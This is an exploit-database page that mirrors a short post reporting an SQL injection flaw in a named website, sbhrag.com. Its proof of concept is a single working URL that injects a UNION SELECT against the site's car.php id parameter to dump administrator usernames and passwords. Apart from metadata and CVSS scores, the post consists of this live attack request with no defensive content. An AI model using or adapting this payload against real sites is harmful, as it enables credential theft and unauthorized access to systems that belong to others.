Advertisement






sbhrag- SQL Injection vulnerability

CVE Category Price Severity
N/A CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-01-08
CPE
cpe:cpe:/a:exploitalert:exploitdatabase:sbhrag-sql-injection-vulnerability
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.506 0.89561

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010074

Below is a copy:

sbhrag- SQL Injection vulnerability
-------------------------------------------------------------*
#Exploit Title: sbhrag- SQL Injection vulnerability
#Date: 2021-01-08
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:

Demo :

https://sbhrag.com/en/car.php?id=-17%27%20union%20select%201,2,3,4,group_concat(username,0x3a,password,%27%3Cbr%3E%27),6,7,8,9,10,11%20from%20admin--+

-------------------------------------------------------------*
#Discovered by: ERa
#Email: [email protected]
-------------------------------------------------------------*

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.